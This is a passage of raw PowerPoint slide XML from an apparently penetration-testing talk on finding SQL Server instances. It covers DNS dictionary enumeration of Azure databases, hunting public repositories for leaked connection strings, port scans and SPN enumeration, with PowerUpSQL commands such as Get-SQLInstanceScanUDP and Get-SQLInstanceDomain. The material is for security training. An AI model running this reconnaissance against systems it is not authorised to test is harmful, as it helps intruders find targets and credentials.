              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>unauthenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>perspective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>PowerUpSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</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dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>residing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>environments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> tester </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>activities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>dictionary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>against</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>URL’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>x.databases.windows.net</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>thing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>look</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>dealing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>residing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>environments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>containing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, on public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>repositories</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Although</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>environments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>behind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a firewall, by default, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a lot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>organizations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> open up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>holes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>those</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>firewalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61D15078-5768-754B-A8A6-07A52C27B42D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719403" y="2372884"/>
            <a:ext cx="11041227" cy="7487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2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt; import-module .\PowerUpSQL.psd1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-SQLInstanceScanUDP</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2133" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>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7813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3008-1736-6847-88D1-B7EA7B66C449}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Perspective</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED370B80-00DE-3E46-9446-B773DF93EABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>TCP/UDP Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> done by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>connected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> network to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>discover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>listening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> on a network port. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>those</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>configured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Instances</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Principal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Names</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> (SPN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>scanning</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>addition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> such as </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>setspn.exe</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>adfind.exe</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Get-Spn.psm1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24B7E8BC-96B2-4148-A879-2F25BC6A635E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639257" y="3889079"/>
            <a:ext cx="11041227" cy="4205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2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-SQLInstanceDomain</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2133" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{455EB8D3-9518-EA41-BA13-39F9FC094CA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639257" y="3203297"/>
            <a:ext cx="11041227" cy="4205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2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
